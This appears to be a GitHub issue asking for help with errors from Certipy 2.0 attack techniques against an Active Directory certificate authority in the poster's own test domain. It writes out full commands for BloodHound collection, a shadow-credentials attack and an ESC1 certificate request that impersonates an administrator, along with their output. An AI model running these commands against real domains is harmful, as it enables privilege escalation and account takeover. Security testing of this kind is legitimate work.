Several errors trying Certify 2.0 intro techniques

[rick-engle]

I've been working my way through a number of the Certify 2.0 features that were described here: https://research.ifcr.dk/certipy-2-0-bloodhound-new-escalations-shadow-credentials-golden-certificates-and-more-34d1c26f0dc6

I created a simple domain user named john to match your examples but I'm having issues with a few commands:

#1 Bloodhound: I can't see any data from the bloodhound import: Certipy find "toondom.com/john:[email protected]" -bloodhound

[] Finding certificate templates [] Found 33 certificate templates [] Finding certificate authorities [] Found 1 certificate authority [] Trying to get CA configuration for 'toondom-TOONDOMCA-EXT-CA' via CSRA [!] Got error while trying to get CA configuration for 'toondom-TOONDOMCA-EXT-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. [] Trying to get CA configuration for 'toondom-TOONDOMCA-EXT-CA' via RRP [!] Failed to connect to remote registry. Service should be starting now. Trying again... [] Got CA configuration for 'toondom-TOONDOMCA-EXT-CA' [] Found 12 enabled certificate templates [*] Saved BloodHound data to '20220812181400_Certipy.zip'. Drag and drop the file into the BloodHound GUI

The command worked and if I drag and drop the .zip file onto the Bloodhound Windows GUI, I see the import process but no data shows up in the Bloodhound console.

#2 I tried the shadow technique but got this error: Certipy shadow auto "toondom.com/john:[email protected]" -account 'johnpc'

[] Targeting user "'JOHNPC'$" [] Generating certificate [] Certificate generated [] Generating Key Credential [*] Key Credential generated with DeviceID '2d258854-0eb1-5bae-5020-4384cc4dd67c' [-] Got error: invalid attribute type msDS-KeyCredentialLink

Any idea why it doesn't like attribute type msDS-KeyCredentialLink?

#3 Certipy req "toondom.com/john:[email protected]" -ca "toondom-TOONDOMCA-EXT-CA" -template "Machine"

[] Requesting certificate [-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate. [] Request ID is 14 Would you like to save the private key? (y/N) n

Why would I get CERTSRV_E_TEMPLATE_DENIED?

#4 In your article about the ESC1 exploit, you have an example command like this: Certipy req "toondom.com/john:[email protected]" -ca "toondom-TOONDOMCA-EXT-CA" -template "ESC1" -alt '[email protected]'

But ESC1 is not a valid template so I'm assuming it is a vulnerable template that was discovered by Bloodhound and I would use that name instead. How can I use Certify to directly show me any vulnerable templates? I found an old blog by someone that used the find -vulnerable command but that does not seem to be valid in Certify 2.0.

Sorry about so many questions in 1 issue.

Thanks, Rick